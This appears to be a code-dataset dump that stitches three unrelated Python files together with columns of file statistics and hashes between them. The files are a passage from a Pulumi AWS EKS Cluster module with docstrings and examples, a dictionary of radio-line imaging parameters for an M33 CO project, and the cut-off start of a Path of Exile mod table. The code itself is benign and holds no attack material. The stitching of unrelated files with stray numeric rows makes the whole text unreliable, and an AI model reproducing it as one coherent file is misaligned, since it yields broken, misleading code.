"audit",
],
opts=pulumi.ResourceOptions(depends_on=[example_log_group]))
# ... other configuration ...
```
## Import
EKS Clusters can be imported using the `name`, e.g.,
```sh
$ pulumi import aws:eks/cluster:Cluster my_cluster my_cluster
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] enabled_cluster_log_types: List of the desired control plane logging to enable. For more information, see [Amazon EKS Control Plane Logging](https://docs.aws.amazon.com/eks/latest/userguide/control-plane-logs.html).
:param pulumi.Input[pulumi.InputType['ClusterEncryptionConfigArgs']] encryption_config: Configuration block with encryption configuration for the cluster. Only available on Kubernetes 1.13 and above clusters created after March 6, 2020. Detailed below.
:param pulumi.Input[pulumi.InputType['ClusterKubernetesNetworkConfigArgs']] kubernetes_network_config: Configuration block with kubernetes network configuration for the cluster. Detailed below. If removed, this provider will only perform drift detection if a configuration value is provided.
:param pulumi.Input[str] name: Name of the cluster. Must be between 1-100 characters in length. Must begin with an alphanumeric character, and must only contain alphanumeric characters, dashes and underscores (`^[0-9A-Za-z][A-Za-z0-9\-_]+$`).
:param pulumi.Input[str] role_arn: ARN of the IAM role that provides permissions for the Kubernetes control plane to make calls to AWS API operations on your behalf.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags.
:param pulumi.Input[str] version: Desired Kubernetes master version. If you do not specify a value, the latest available version at resource creation is used and no upgrades will occur except those automatically triggered by EKS. The value must be configured and increased to upgrade the version when desired. Downgrades are not supported by EKS.
:param pulumi.Input[pulumi.InputType['ClusterVpcConfigArgs']] vpc_config: Configuration block for the VPC associated with your cluster. Amazon EKS VPC resources have specific requirements to work properly with Kubernetes. For more information, see [Cluster VPC Considerations](https://docs.aws.amazon.com/eks/latest/userguide/network_reqs.html) and [Cluster Security Group Considerations](https://docs.aws.amazon.com/eks/latest/userguide/sec-group-reqs.html) in the Amazon EKS User Guide. Detailed below. Also contains attributes detailed in the Attributes section.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ClusterArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages an EKS Cluster.
## Example Usage
### Basic Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.eks.Cluster("example",
role_arn=aws_iam_role["example"]["arn"],
vpc_config=aws.eks.ClusterVpcConfigArgs(
subnet_ids=[
aws_subnet["example1"]["id"],
aws_subnet["example2"]["id"],
],
),
opts=pulumi.ResourceOptions(depends_on=[
aws_iam_role_policy_attachment["example-AmazonEKSClusterPolicy"],
aws_iam_role_policy_attachment["example-AmazonEKSVPCResourceController"],
]))
pulumi.export("endpoint", example.endpoint)
pulumi.export("kubeconfig-certificate-authority-data", example.certificate_authority.data)
```
### Example IAM Role for EKS Cluster
```python
import pulumi
import pulumi_aws as aws
example = aws.iam.Role("example", assume_role_policy=\"\"\"{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "eks.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
}
\"\"\")
example__amazon_eks_cluster_policy = aws.iam.RolePolicyAttachment("example-AmazonEKSClusterPolicy",
policy_arn="arn:aws:iam::aws:policy/AmazonEKSClusterPolicy",
role=example.name)
# Optionally, enable Security Groups for Pods
# Reference: https://docs.aws.amazon.com/eks/latest/userguide/security-groups-for-pods.html
example__amazon_eksvpc_resource_controller = aws.iam.RolePolicyAttachment("example-AmazonEKSVPCResourceController",
policy_arn="arn:aws:iam::aws:policy/AmazonEKSVPCResourceController",
role=example.name)
```
### Enabling Control Plane Logging
[EKS Control Plane Logging](https://docs.aws.amazon.com/eks/latest/userguide/control-plane-logs.html) can be enabled via the `enabled_cluster_log_types` argument. To manage the CloudWatch Log Group retention period, the `cloudwatch.LogGroup` resource can be used.
> The below configuration uses [`dependsOn`](https://www.pulumi.com/docs/intro/concepts/programming-model/#dependson) to prevent ordering issues with EKS automatically creating the log group first and a variable for naming consistency. Other ordering and naming methodologies may be more appropriate for your environment.
```python
import pulumi
import pulumi_aws as aws
config = pulumi.Config()
cluster_name = config.get("clusterName")
if cluster_name is None:
cluster_name = "example"
example_log_group = aws.cloudwatch.LogGroup("exampleLogGroup", retention_in_days=7)
# ... potentially other configuration ...
example_cluster = aws.eks.Cluster("exampleCluster", enabled_cluster_log_types=[
"api",
"audit",
],
opts=pulumi.ResourceOptions(depends_on=[example_log_group]))
# ... other configuration ...
```
## Import
EKS Clusters can be imported using the `name`, e.g.,
```sh
$ pulumi import aws:eks/cluster:Cluster my_cluster my_cluster
```
:param str resource_name: The name of the resource.
:param ClusterArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ClusterArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
enabled_cluster_log_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
encryption_config: Optional[pulumi.Input[pulumi.InputType['ClusterEncryptionConfigArgs']]] = None,
kubernetes_network_config: Optional[pulumi.Input[pulumi.InputType['ClusterKubernetesNetworkConfigArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
role_arn: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
version: Optional[pulumi.Input[str]] = None,
vpc_config: Optional[pulumi.Input[pulumi.InputType['ClusterVpcConfigArgs']]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ClusterArgs.__new__(ClusterArgs)
__props__.__dict__["enabled_cluster_log_types"] = enabled_cluster_log_types
__props__.__dict__["encryption_config"] = encryption_config
__props__.__dict__["kubernetes_network_config"] = kubernetes_network_config
__props__.__dict__["name"] = name
if role_arn is None and not opts.urn:
raise TypeError("Missing required property 'role_arn'")
__props__.__dict__["role_arn"] = role_arn
__props__.__dict__["tags"] = tags
__props__.__dict__["version"] = version
if vpc_config is None and not opts.urn:
raise TypeError("Missing required property 'vpc_config'")
__props__.__dict__["vpc_config"] = vpc_config
__props__.__dict__["arn"] = None
__props__.__dict__["certificate_authority"] = None
__props__.__dict__["created_at"] = None
__props__.__dict__["endpoint"] = None
__props__.__dict__["identities"] = None
__props__.__dict__["platform_version"] = None
__props__.__dict__["status"] = None
__props__.__dict__["tags_all"] = None
super(Cluster, __self__).__init__(
'aws:eks/cluster:Cluster',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
arn: Optional[pulumi.Input[str]] = None,
certificate_authority: Optional[pulumi.Input[pulumi.InputType['ClusterCertificateAuthorityArgs']]] = None,
created_at: Optional[pulumi.Input[str]] = None,
enabled_cluster_log_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
encryption_config: Optional[pulumi.Input[pulumi.InputType['ClusterEncryptionConfigArgs']]] = None,
endpoint: Optional[pulumi.Input[str]] = None,
identities: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ClusterIdentityArgs']]]]] = None,
kubernetes_network_config: Optional[pulumi.Input[pulumi.InputType['ClusterKubernetesNetworkConfigArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
platform_version: Optional[pulumi.Input[str]] = None,
role_arn: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
version: Optional[pulumi.Input[str]] = None,
vpc_config: Optional[pulumi.Input[pulumi.InputType['ClusterVpcConfigArgs']]] = None) -> 'Cluster':
"""
Get an existing Cluster resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] arn: ARN of the cluster.
:param pulumi.Input[pulumi.InputType['ClusterCertificateAuthorityArgs']] certificate_authority: Attribute block containing `certificate-authority-data` for your cluster. Detailed below.
:param pulumi.Input[str] created_at: Unix epoch timestamp in seconds for when the cluster was created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] enabled_cluster_log_types: List of the desired control plane logging to enable. For more information, see [Amazon EKS Control Plane Logging](https://docs.aws.amazon.com/eks/latest/userguide/control-plane-logs.html).
:param pulumi.Input[pulumi.InputType['ClusterEncryptionConfigArgs']] encryption_config: Configuration block with encryption configuration for the cluster. Only available on Kubernetes 1.13 and above clusters created after March 6, 2020. Detailed below.
:param pulumi.Input[str] endpoint: Endpoint for your Kubernetes API server.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ClusterIdentityArgs']]]] identities: Attribute block containing identity provider information for your cluster. Only available on Kubernetes version 1.13 and 1.14 clusters created or upgraded on or after September 3, 2019. Detailed below.
:param pulumi.Input[pulumi.InputType['ClusterKubernetesNetworkConfigArgs']] kubernetes_network_config: Configuration block with kubernetes network configuration for the cluster. Detailed below. If removed, this provider will only perform drift detection if a configuration value is provided.
:param pulumi.Input[str] name: Name of the cluster. Must be between 1-100 characters in length. Must begin with an alphanumeric character, and must only contain alphanumeric characters, dashes and underscores (`^[0-9A-Za-z][A-Za-z0-9\-_]+$`).
:param pulumi.Input[str] platform_version: Platform version for the cluster.
:param pulumi.Input[str] role_arn: ARN of the IAM role that provides permissions for the Kubernetes control plane to make calls to AWS API operations on your behalf.
:param pulumi.Input[str] status: Status of the EKS cluster. One of `CREATING`, `ACTIVE`, `DELETING`, `FAILED`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: Map of tags assigned to the resource, including those inherited from the provider.
:param pulumi.Input[str] version: Desired Kubernetes master version. If you do not specify a value, the latest available version at resource creation is used and no upgrades will occur except those automatically triggered by EKS. The value must be configured and increased to upgrade the version when desired. Downgrades are not supported by EKS.
:param pulumi.Input[pulumi.InputType['ClusterVpcConfigArgs']] vpc_config: Configuration block for the VPC associated with your cluster. Amazon EKS VPC resources have specific requirements to work properly with Kubernetes. For more information, see [Cluster VPC Considerations](https://docs.aws.amazon.com/eks/latest/userguide/network_reqs.html) and [Cluster Security Group Considerations](https://docs.aws.amazon.com/eks/latest/userguide/sec-group-reqs.html) in the Amazon EKS User Guide. Detailed below. Also contains attributes detailed in the Attributes section.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ClusterState.__new__(_ClusterState)
__props__.__dict__["arn"] = arn
__props__.__dict__["certificate_authority"] = certificate_authority
__props__.__dict__["created_at"] = created_at
__props__.__dict__["enabled_cluster_log_types"] = enabled_cluster_log_types
__props__.__dict__["encryption_config"] = encryption_config
__props__.__dict__["endpoint"] = endpoint
__props__.__dict__["identities"] = identities
__props__.__dict__["kubernetes_network_config"] = kubernetes_network_config
__props__.__dict__["name"] = name
__props__.__dict__["platform_version"] = platform_version
__props__.__dict__["role_arn"] = role_arn
__props__.__dict__["status"] = status
__props__.__dict__["tags"] = tags
__props__.__dict__["tags_all"] = tags_all
__props__.__dict__["version"] = version
__props__.__dict__["vpc_config"] = vpc_config
return Cluster(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
"""
ARN of the cluster.
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter(name="certificateAuthority")
def certificate_authority(self) -> pulumi.Output['outputs.ClusterCertificateAuthority']:
"""
Attribute block containing `certificate-authority-data` for your cluster. Detailed below.
"""
return pulumi.get(self, "certificate_authority")
@property
@pulumi.getter(name="createdAt")
def created_at(self) -> pulumi.Output[str]:
"""
Unix epoch timestamp in seconds for when the cluster was created.
"""
return pulumi.get(self, "created_at")
@property
@pulumi.getter(name="enabledClusterLogTypes")
def enabled_cluster_log_types(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
List of the desired control plane logging to enable. For more information, see [Amazon EKS Control Plane Logging](https://docs.aws.amazon.com/eks/latest/userguide/control-plane-logs.html).
"""
return pulumi.get(self, "enabled_cluster_log_types")
@property
@pulumi.getter(name="encryptionConfig")
def encryption_config(self) -> pulumi.Output[Optional['outputs.ClusterEncryptionConfig']]:
"""
Configuration block with encryption configuration for the cluster. Only available on Kubernetes 1.13 and above clusters created after March 6, 2020. Detailed below.
"""
return pulumi.get(self, "encryption_config")
@property
@pulumi.getter
def endpoint(self) -> pulumi.Output[str]:
"""
Endpoint for your Kubernetes API server.
"""
return pulumi.get(self, "endpoint")
@property
@pulumi.getter
def identities(self) -> pulumi.Output[Sequence['outputs.ClusterIdentity']]:
"""
Attribute block containing identity provider information for your cluster. Only available on Kubernetes version 1.13 and 1.14 clusters created or upgraded on or after September 3, 2019. Detailed below.
"""
return pulumi.get(self, "identities")
@property
@pulumi.getter(name="kubernetesNetworkConfig")
def kubernetes_network_config(self) -> pulumi.Output['outputs.ClusterKubernetesNetworkConfig']:
"""
Configuration block with kubernetes network configuration for the cluster. Detailed below. If removed, this provider will only perform drift detection if a configuration value is provided.
"""
return pulumi.get(self, "kubernetes_network_config")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the cluster. Must be between 1-100 characters in length. Must begin with an alphanumeric character, and must only contain alphanumeric characters, dashes and underscores (`^[0-9A-Za-z][A-Za-z0-9\-_]+$`).
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="platformVersion")
def platform_version(self) -> pulumi.Output[str]:
"""
Platform version for the cluster.
"""
return pulumi.get(self, "platform_version")
@property
@pulumi.getter(name="roleArn")
def role_arn(self) -> pulumi.Output[str]:
"""
ARN of the IAM role that provides permissions for the Kubernetes control plane to make calls to AWS API operations on your behalf.
"""
return pulumi.get(self, "role_arn")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
"""
Status of the EKS cluster. One of `CREATING`, `ACTIVE`, `DELETING`, `FAILED`.
"""
return pulumi.get(self, "status")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Key-value map of resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> pulumi.Output[Mapping[str, str]]:
"""
Map of tags assigned to the resource, including those inherited from the provider.
"""
return pulumi.get(self, "tags_all")
@property
@pulumi.getter
def version(self) -> pulumi.Output[str]:
"""
Desired Kubernetes master version. If you do not specify a value, the latest available version at resource creation is used and no upgrades will occur except those automatically triggered by EKS. The value must be configured and increased to upgrade the version when desired. Downgrades are not supported by EKS.
"""
return pulumi.get(self, "version")
@property
@pulumi.getter(name="vpcConfig")
def vpc_config(self) -> pulumi.Output['outputs.ClusterVpcConfig']:
"""
Configuration block for the VPC associated with your cluster. Amazon EKS VPC resources have specific requirements to work properly with Kubernetes. For more information, see [Cluster VPC Considerations](https://docs.aws.amazon.com/eks/latest/userguide/network_reqs.html) and [Cluster Security Group Considerations](https://docs.aws.amazon.com/eks/latest/userguide/sec-group-reqs.html) in the Amazon EKS User Guide. Detailed below. Also contains attributes detailed in the Attributes section.
"""
return pulumi.get(self, "vpc_config")
| 55.981588
| 573
| 0.685331
| 5,773
| 48,648
| 5.613026
| 0.063052
| 0.065856
| 0.044501
| 0.029873
| 0.914825
| 0.898222
| 0.878719
| 0.86693
| 0.859061
| 0.83323
| 0
| 0.004686
| 0.214747
| 48,648
| 868
| 574
| 56.046083
| 0.843564
| 0.491737
| 0
| 0.664336
| 1
| 0
| 0.139554
| 0.070501
| 0
| 0
| 0
| 0
| 0
| 1
| 0.165501
| false
| 0.002331
| 0.016317
| 0
| 0.284382
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b94238a08130bc004b45ea5500c22342b7111140
| 5,491
|
py
|
Python
|
imaging/line_imaging_params.py
|
Astroua/M33_CO21_ACA_mapping
|
9e312ef83e9b231a8eabc98a87518404295228bf
|
[
"MIT"
] | null | null | null |
imaging/line_imaging_params.py
|
Astroua/M33_CO21_ACA_mapping
|
9e312ef83e9b231a8eabc98a87518404295228bf
|
[
"MIT"
] | null | null | null |
imaging/line_imaging_params.py
|
Astroua/M33_CO21_ACA_mapping
|
9e312ef83e9b231a8eabc98a87518404295228bf
|
[
"MIT"
] | null | null | null |
'''
Define imaging parameters for each line.
'''
imaging_linedict = \
{'12CO21': {"native": {'cellsize': '1arcsec', 'imsize': [512, 512],
'width': 1, 'start': 1, 'nchan': -1},
"0p7kms": {'cellsize': '1arcsec', 'imsize': [512, 512],
'width': "0.67km/s", 'start': "-280km/s",
'nchan': 300},
"1p3kms": {'cellsize': '1arcsec', 'imsize': [512, 512],
'width': "1.34km/s", 'start': "-280km/s",
'nchan': 150},
"2kms": {'cellsize': '1arcsec', 'imsize': [512, 512],
'width': "2.0km/s", 'start': "-280km/s",
'nchan': 100},
"2p6kms": {'cellsize': '1arcsec', 'imsize': [512, 512],
'width': "2.6km/s", 'start': "-280km/s",
'nchan': 77}},
'13CO21': {"native": {'cellsize': '1arcsec', 'imsize': [512, 512],
'width': 1, 'start': 1, 'nchan': -1},
"0p7kms": {'cellsize': '1arcsec', 'imsize': [512, 512],
'width': "0.67km/s", 'start': "-280km/s",
'nchan': 300},
"1p3kms": {'cellsize': '1arcsec', 'imsize': [512, 512],
'width': "1.34km/s", 'start': "-280km/s",
'nchan': 150},
"2kms": {'cellsize': '1arcsec', 'imsize': [512, 512],
'width': "2.0km/s", 'start': "-280km/s",
'nchan': 100},
"2p6kms": {'cellsize': '1arcsec', 'imsize': [512, 512],
'width': "2.6km/s", 'start': "-280km/s",
'nchan': 77}},
'C18O21': {"native": {'cellsize': '1arcsec', 'imsize': [512, 512],
'width': 1, 'start': 1, 'nchan': -1},
"0p7kms": {'cellsize': '1arcsec', 'imsize': [512, 512],
'width': "0.67km/s", 'start': "-280km/s",
'nchan': 300},
"1p3kms": {'cellsize': '1arcsec', 'imsize': [512, 512],
'width': "1.34km/s", 'start': "-280km/s",
'nchan': 150},
"2kms": {'cellsize': '1arcsec', 'imsize': [512, 512],
'width': "2.0km/s", 'start': "-280km/s",
'nchan': 100},
"2p6kms": {'cellsize': '1arcsec', 'imsize': [512, 512],
'width': "2.6km/s", 'start': "-280km/s",
'nchan': 77}},
'H2CO_303_202': {"native": {'cellsize': '1arcsec', 'imsize': [512, 512],
'width': 1, 'start': 1, 'nchan': -1},
"0p7kms": {'cellsize': '1arcsec', 'imsize': [512, 512],
'width': "0.7km/s", 'start': "-280km/s",
'nchan': 300},
"1p3kms": {'cellsize': '1arcsec', 'imsize': [512, 512],
'width': "1.4km/s", 'start': "-280km/s",
'nchan': 150},
"2kms": {'cellsize': '1arcsec', 'imsize': [512, 512],
'width': "2.0km/s", 'start': "-280km/s",
'nchan': 100},
"2p6kms": {'cellsize': '1arcsec', 'imsize': [512, 512],
'width': "2.6km/s", 'start': "-280km/s",
'nchan': 77}},
'H2CO_322_221': {"native": {'cellsize': '1arcsec', 'imsize': [512, 512],
'width': 1, 'start': 1, 'nchan': -1},
"0p7kms": {'cellsize': '1arcsec', 'imsize': [512, 512],
'width': "0.7km/s", 'start': "-280km/s",
'nchan': 300},
"1p3kms": {'cellsize': '1arcsec', 'imsize': [512, 512],
'width': "1.4km/s", 'start': "-280km/s",
'nchan': 150},
"2kms": {'cellsize': '1arcsec', 'imsize': [512, 512],
'width': "2.0km/s", 'start': "-280km/s",
'nchan': 100},
"2p6kms": {'cellsize': '1arcsec', 'imsize': [512, 512],
'width': "2.6km/s", 'start': "-280km/s",
'nchan': 77}},
'H2CO_321_220': {"native": {'cellsize': '1arcsec', 'imsize': [512, 512],
'width': 1, 'start': 1, 'nchan': -1},
"0p7kms": {'cellsize': '1arcsec', 'imsize': [512, 512],
'width': "0.7km/s", 'start': "-280km/s",
'nchan': 300},
"1p3kms": {'cellsize': '1arcsec', 'imsize': [512, 512],
'width': "1.4km/s", 'start': "-280km/s",
'nchan': 150},
"2kms": {'cellsize': '1arcsec', 'imsize': [512, 512],
'width': "2.0km/s", 'start': "-280km/s",
'nchan': 100},
"2p6kms": {'cellsize': '1arcsec', 'imsize': [512, 512],
'width': "2.6km/s", 'start': "-280km/s",
'nchan': 77}},
}
| 59.684783
| 77
| 0.343471
| 452
| 5,491
| 4.15708
| 0.097345
| 0.239489
| 0.335285
| 0.383183
| 0.954763
| 0.954763
| 0.954763
| 0.954763
| 0.954763
| 0.954763
| 0
| 0.163636
| 0.449099
| 5,491
| 91
| 78
| 60.340659
| 0.457521
| 0.007285
| 0
| 0.906977
| 0
| 0
| 0.306505
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
b97fdfe7f05114b0f1e1ddcb4a253a4f7d2c5a72
| 513,292
|
py
|
Python
|
mod_table.py
|
xanthics/poe_fractured
|
e7627dcc714af4ebf20a0dabfbd19cc82b73c9d4
|
[
"MIT"
] | 3
|
2019-03-20T12:02:31.000Z
|
2020-02-26T12:40:24.000Z
|
mod_table.py
|
xanthics/poe_fractured
|
e7627dcc714af4ebf20a0dabfbd19cc82b73c9d4
|
[
"MIT"
] | 2
|
2019-03-23T19:05:43.000Z
|
2019-04-02T02:38:39.000Z
|
mod_table.py
|
xanthics/poe_fractured
|
e7627dcc714af4ebf20a0dabfbd19cc82b73c9d4
|
[
"MIT"
] | null | null | null |
table = {
"Abyss Jewel": {
"# Energy Shield Regenerated per second": [(30, '(3 - 4) to maximum Energy Shield'), (100, '0.2% of Energy Shield Regenerated per second')],
"# Life Regenerated per second": [(27.0, '(3 - 4) to maximum Life'), (83.33, '0.2% of Life Regenerated per second')],
"# Mana Regenerated per second": [(7.0, '(2 - 3) to maximum Mana'), (16.67, '(5 - 7)% increased Mana Regeneration Rate')],
"#% additional Physical Damage Reduction against Abyssal Monsters": [(15, '(-7 - -5) Physical Damage taken from Attacks'), (50, '(-10 - -8) Physical Damage taken from Attacks')],
"#% additional Physical Damage Reduction if you weren't Damaged by a Hit Recently": [(4, '(-7 - -5) Physical Damage taken from Attacks'), (10, '(-10 - -8) Physical Damage taken from Attacks')],
"#% chance to Avoid being Frozen": [(24, '(5 - 7)% reduced Elemental Ailment Duration on you'), (50, '(3 - 5)% chance to Avoid being Frozen')],
"#% chance to Avoid being Ignited": [(24, '(5 - 7)% reduced Elemental Ailment Duration on you'), (50, '(3 - 5)% chance to Avoid being Ignited')],
"#% chance to Avoid being Poisoned": [(24, '(5 - 7)% reduced Elemental Ailment Duration on you'), (50, '(3 - 5)% chance to Avoid being Poisoned')],
"#% chance to Avoid being Shocked": [(24, '(5 - 7)% reduced Elemental Ailment Duration on you'), (50, '(3 - 5)% chance to Avoid being Shocked')],
"#% chance to Avoid being Stunned": [(25, '(6 - 7)% increased Stun and Block Recovery'), (100, '(3 - 5)% chance to Avoid being Stunned')],
"#% chance to Avoid interruption from Stuns while Casting": [(55, '(6 - 7)% increased Stun and Block Recovery'), (100, '(8 - 10)% chance to Avoid interruption from Stuns while Casting')],
"#% chance to Blind Enemies on Hit with Attacks": [(15, '(1 - 2)% chance to Blind Enemies on Hit with Attacks'), (50, '(3 - 4)% chance to Blind Enemies on Hit with Attacks')],
"#% chance to Dodge Attack and Spell Hits if you've been Hit Recently": [(4, '(3 - 4)% increased Evasion Rating'), (10, '(5 - 7)% chance to Avoid Elemental Ailments')],
"#% chance to Gain Unholy Might for 4 seconds on Melee Kill": [(12, '(6 - 8)% increased Physical Damage while you have Unholy Might'), (50, '(9 - 10)% increased Physical Damage while you have Unholy Might')],
"#% chance to Hinder Enemies on Hit with Spells, with 30% reduced Movement Speed": [(20, '(1 - 2)% chance to Hinder Enemies on Hit with Spells, with 30% reduced Movement Speed'), (50, '(3 - 4)% chance to Hinder Enemies on Hit with Spells, with 30% reduced Movement Speed')],
"#% chance to Taunt Enemies on Hit with Attacks": [(20, '(1 - 2)% chance to Taunt Enemies on Hit with Attacks'), (50, '(3 - 4)% chance to Taunt Enemies on Hit with Attacks')],
"#% chance to avoid Bleeding": [(24, '(5 - 7)% reduced Elemental Ailment Duration on you'), (50, '(3 - 5)% chance to avoid Bleeding')],
"#% chance to gain Onslaught for 4 seconds on Kill": [(20, '(2 - 3)% increased Attack and Cast Speed during Onslaught'), (50, '(4 - 5)% increased Attack and Cast Speed during Onslaught')],
"#% chance to gain Onslaught when you use a Flask": [(26, '1% increased Attack and Cast Speed'), (50, '2% increased Attack Speed\n2% increased Cast Speed')],
"#% chance to gain Phasing for 4 seconds on Kill": [(20, '2% increased Movement Speed while Phasing'), (50, '3% increased Movement Speed while Phasing')],
"#% increased Accuracy Rating if you haven't Killed Recently": [(70, '(21 - 35) to Accuracy Rating'), (150, '(36 - 50) to Accuracy Rating')],
"#% increased Armour if you haven't Killed Recently": [(80, '(3 - 4)% increased Armour'), (150, '(5 - 6)% increased Armour')],
"#% increased Attack Speed": [(10, '1% increased Attack Speed'), (50, '2% increased Attack Speed')],
"#% increased Attack Speed if you've dealt a Critical Strike Recently": [(20, '1% increased Attack Speed'), (50, '2% increased Attack Speed')],
"#% increased Cast Speed": [(10, '1% increased Cast Speed'), (50, '2% increased Cast Speed')],
"#% increased Cast Speed if you've dealt a Critical Strike Recently": [(18, '1% increased Cast Speed'), (50, '2% increased Cast Speed')],
"#% increased Critical Strike Chance if you haven't dealt a Critical Strike Recently": [(80, '2% increased Global Critical Strike Chance'), (200, '(3 - 4)% increased Global Critical Strike Chance')],
"#% increased Damage against Abyssal Monsters": [(100, '2% increased Damage'), (200, '(3 - 4)% increased Damage')],
"#% increased Damage if you've Killed Recently": [(50, '2% increased Damage'), (100, '(3 - 4)% increased Damage')],
"#% increased Damage over Time while Dual Wielding": [(35, '(2 - 3)% increased Damage over Time'), (100, '(4 - 5)% increased Damage over Time')],
"#% increased Damage over Time while holding a Shield": [(35, '(2 - 3)% increased Damage over Time'), (100, '(4 - 5)% increased Damage over Time')],
"#% increased Damage over Time while wielding a Two Handed Weapon": [(35, '(2 - 3)% increased Damage over Time'), (100, '(4 - 5)% increased Damage over Time')],
"#% increased Damage with Ailments": [(50, '(2 - 3)% increased Damage with Ailments'), (100, '(4 - 5)% increased Damage with Ailments')],
"#% increased Effect of Chill": [(26, '(2 - 3)% increased Chill Duration on Enemies'), (50, '(4 - 5)% increased Chill Duration on Enemies\n(2 - 3)% increased Effect of Chill')],
"#% increased Effect of Shock": [(26, '(2 - 3)% increased Shock Duration on Enemies'), (50, '(4 - 5)% increased Shock Duration on Enemies\n(2 - 3)% increased Effect of Shock')],
"#% increased Evasion Rating while moving": [(100, '(3 - 4)% increased Evasion Rating'), (500, '(5 - 6)% increased Evasion Rating')],
"#% increased Global Critical Strike Chance": [(30, '2% increased Global Critical Strike Chance'), (100, '(3 - 4)% increased Global Critical Strike Chance')],
"#% increased Global Defences": [(16, '(3 - 4)% increased Armour\n(3 - 4)% increased Evasion Rating\n(3 - 4) to maximum Energy Shield'), (50, '(5 - 6)% increased Armour\n(5 - 6)% increased Evasion Rating\n(5 - 6) to maximum Energy Shield')],
"#% increased Mana Regeneration Rate while moving": [(60, '(2 - 3) to maximum Mana'), (100, '(5 - 7)% increased Mana Regeneration Rate')],
"#% increased Minion Damage if you've used a Minion Skill Recently": [(45, 'Minions deal (2 - 3)% increased Damage'), (100, 'Minions deal (4 - 5)% increased Damage')],
"#% increased Movement Speed if you haven't taken Damage Recently": [(10, '1% increased Movement Speed'), (20, '2% increased Movement Speed')],
"#% increased Movement Speed if you've Killed Recently": [(10, '1% increased Movement Speed'), (20, '2% increased Movement Speed')],
"#% of Attack Damage Leeched as Life": [(0.8, '(3 - 4) to maximum Life'), (1.5, '0.2% of Attack Damage Leeched as Life')],
"#% of Damage taken gained as Mana over 4 seconds when Hit": [(7, '(2 - 3) to maximum Mana'), (20, '(5 - 7)% increased Mana Regeneration Rate')],
"#% of Energy Shield Regenerated per second if you've Hit an Enemy Recently": [(0.8, '(3 - 4) to maximum Energy Shield'), (1.67, '(5 - 6) to maximum Energy Shield')],
"#% of Life Regenerated per second": [(0.8, '(3 - 4) to maximum Life'), (1.67, '0.2% of Life Regenerated per second')],
"#% of Life Regenerated per second while moving": [(1.67, '(3 - 4) to maximum Life'), (8.33, '0.2% of Life Regenerated per second')],
"#% reduced Physical Damage taken over time": [(4, '(-7 - -5) Physical Damage taken from Attacks'), (10, '(-10 - -8) Physical Damage taken from Attacks')],
"+# to Accuracy Rating": [(600, '(21 - 35) to Accuracy Rating'), (2000, '(36 - 50) to Accuracy Rating')],
